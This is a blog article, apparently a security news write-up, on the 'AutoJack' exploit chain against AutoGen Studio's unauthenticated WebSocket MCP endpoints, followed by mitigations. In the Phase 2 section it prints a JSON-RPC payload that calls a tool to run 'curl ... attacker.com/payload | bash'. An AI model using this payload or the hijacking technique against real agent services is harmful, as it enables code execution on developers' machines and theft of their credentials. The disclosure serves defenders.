Executive Summary
Microsoft researchers disclosed 'AutoJack', a remote code execution exploit targeting AutoGen Studio via unauthenticated WebSocket browser hijacking.

Microsoft Discloses 'AutoJack' AI Agent RCE Chain Targeting AutoGen Studio

By Vatsal Shah · June 19, 2026 · Cyber Security · Source: Microsoft Security Response Center


INSIGHT

AI SUMMARY

  • Microsoft Security researchers publicly disclosed 'AutoJack' on June 18, 2026, a critical exploit chain resulting in Remote Code Execution (RCE) on developer machines.
  • The vulnerability targets pre-release builds of AutoGen Studio that expose unauthenticated WebSocket endpoints under the /api/mcp/* path.
  • By leveraging cross-origin WebSocket hijacking (CSWSH), malicious websites can send commands to local AutoGen services, bypassing standard localhost trust boundaries.
  • The exploit allows an attacker to hijack the agent's web browsing actions and execute arbitrary shell commands with the privileges of the local developer.
  • Microsoft and the AutoGen team have released an upstream main branch patch enforcing WebSocket token authentication and restricting cross-origin requests.

What Happened

On June 18, 2026, Microsoft Security Response Center (MSRC) published a warning detailing 'AutoJack', a multi-stage exploit chain that allows remote attackers to execute arbitrary code on developer workstations. The vector exploits a vulnerability in the local development server of AutoGen Studio, Microsoft’s popular multi-agent orchestration framework.

The vulnerability stems from the way AutoGen Studio handles local connections. Because developers run AutoGen Studio locally (typically binding to localhost:8081 or similar), the service assumed that any incoming connection from the local machine was trusted. However, Microsoft researchers demonstrated that this localhost trust bypass can be triggered externally. If a developer running AutoGen Studio visits a malicious website or clicks a poisoned link in an agent's browser, the attacker's site can run client-side script in the background. This script opens a connection to the local AutoGen server, bypassing standard cross-origin protection.

AutoGen Studio Security Compromise Visualization
Figure 1: Visualization of the AutoJack exploit chain, showing a remote host hijacking local AutoGen Studio development servers via unauthenticated browser vectors.

Once connected, the exploit utilizes unauthenticated Model Context Protocol (MCP) endpoints. By sending specialized payloads over the WebSockets interface at /api/mcp/*, the attacker can force the AutoGen orchestration engine to execute system commands under the guise of agent tool calls, resulting in full compromise of the developer's system. The AutoGen team has committed a hotfix to the main project branch to enforce strict authorization tokens and CORS controls.


Technical Analysis of the Exploit Chain

The AutoJack vulnerability highlights a major security challenge in the design of agentic tools: the assumption of local network safety. The exploit utilizes three distinct phases to transition from a browser tab to local system execution.

Phase 1: Bypassing Localhost Trust Bounds

Most web browsers block standard HTTP requests from an external public site (e.g., attacker.com) to a local address (e.g., 127.0.0.1:8081) via Cross-Origin Resource Sharing (CORS) rules. However, browsers do not apply the same strict checks to WebSocket connections.

Through Cross-Origin WebSocket Hijacking (CSWSH), a script running on attacker.com can request a WebSocket upgrade targeting ws://127.0.0.1:8081/api/mcp/chat. Because the AutoGen server did not check the Origin header of incoming WebSocket upgrade requests, it accepted the connection from the malicious origin.

Phase 2: The MCP WebSocket Authentication Flaw

The Model Context Protocol (MCP) allows agents to connect to local servers that expose tools, resources, and prompts. In pre-release builds of AutoGen Studio, these MCP interfaces were unauthenticated.

Once the WebSocket connection is established, the attacker sends an MCP JSON-RPC message. The message calls a tool registration method, registering a custom shell execution tool or invoking a pre-existing tool (like execute_command) that runs arbitrary code:

JSON
{
  "jsonrpc": "2.0",
  "method": "tools/call",
  "params": {
    "name": "execute_command",
    "arguments": {
      "command": "curl -s http://attacker.com/payload | bash"
    }
  },
  "id": 1
}

Phase 3: System Execution

Because the AutoGen Studio server runs with the user permissions of the developer, the command executes locally on the workstation. This grants the attacker access to local environment variables, SSH keys, source repositories, and cloud credentials.

AutoJack RCE Exploit Chain Flowchart
Figure 2: Flowchart of the AutoJack exploit chain, illustrating how an external browser connection transitions to local remote code execution via unauthenticated WebSockets.

Mitigations and Upstream Patches

Upon receiving the report from Microsoft researchers, the AutoGen maintainers worked quickly to release patches. Developers running AutoGen Studio should upgrade to the latest stable release immediately.

Enforcing Strict Authentication Tokens

The hotfix changes the WebSocket startup logic to require a cryptographically random token. When AutoGen Studio launches, it generates a single-use token and writes it to a local configuration file. All client requests—including WebSocket upgrades—must include this token in the query parameters:

ws://127.0.0.1:8081/api/mcp/chat?token=ab89c892e8fa...

Connections lacking a valid token are immediately rejected, blocking cross-origin attempts because external sites cannot read the local token file.

Restricting the Origin Header

The WebSocket server now validates the Origin header. It only permits connections where the origin matches the configured host (typically localhost or 127.0.0.1), throwing a 403 Forbidden error for external domains.

Implementing Agent Browsing Isolation Gates

To prevent agents from visiting malicious sites that trigger these local vectors, organizations are encouraged to implement isolated browsing gateways. An isolation gate routes agent web browsing traffic through an isolated virtual sandbox, preventing scripts from accessing the developer's local loopback interface.

Agent Browsing Isolation Gate Schema
Figure 3: Architecture of an agent browsing isolation gate, showing the separation between public internet requests and the local loopback network.

Why It Matters

The Risk of Agentic Tooling Sprawl

The AutoJack disclosure highlights a growing risk in enterprise AI deployments: the security debt associated with local developer tools. As organizations rush to adopt frameworks like AutoGen and LangGraph, developers are running unauthenticated API services on their local machines, expanding the corporate attack surface.

This trend is part of a broader rise in security vulnerabilities, as detailed in our coverage of AI Agent Security Incidents (88% Rise) and the updated OWASP Agentic AI Security Governance 2.0 guidelines.

Bypassing Localhost Assumptions

Many developer tools treat localhost as a safe zone, assuming that only local users can access it. AutoJack shows that this assumption is flawed. Any local service that does not validate origins, enforce authentication, or restrict WebSocket upgrades can be exploited remotely via browser-based vectors.

To help security teams audit and mitigate these risks, we have built a comprehensive governance framework in our playbook on Surviving Shadow AI & Architecting Enterprise Governance.


What to Watch Next

  • Broadening Security Audits: Security researchers are auditing other popular agent frameworks (including CrewAI, Semantic Kernel, and LangChain templates) for similar cross-origin WebSocket weaknesses.
  • Enterprise Restrictions on Local Servers: Expect corporate security teams to block unauthenticated local loopback servers on developer workstations, mandating centralized, audited developer environments.
  • Model Context Protocol (MCP) Evolution: The MCP working group is drafting standard security models to enforce token authentication and encrypted connections across all host-client interactions.

Source

Microsoft Security Response Center — AutoJack Exploitation Report (Jun 18, 2026)

Additional references: Cloud Security Alliance AI Safety Initiative

Related on shahvatsal.com:


Vatsal Shah

Vatsal Shah

Technical Project Manager & Solution Architect

I write code, ship agentic systems, and advise boards from India and global HQ — 15+ years across BFSI, GCC, and Fortune-scale cloud programs. If you need architecture that survives audit, start here.

View credentials →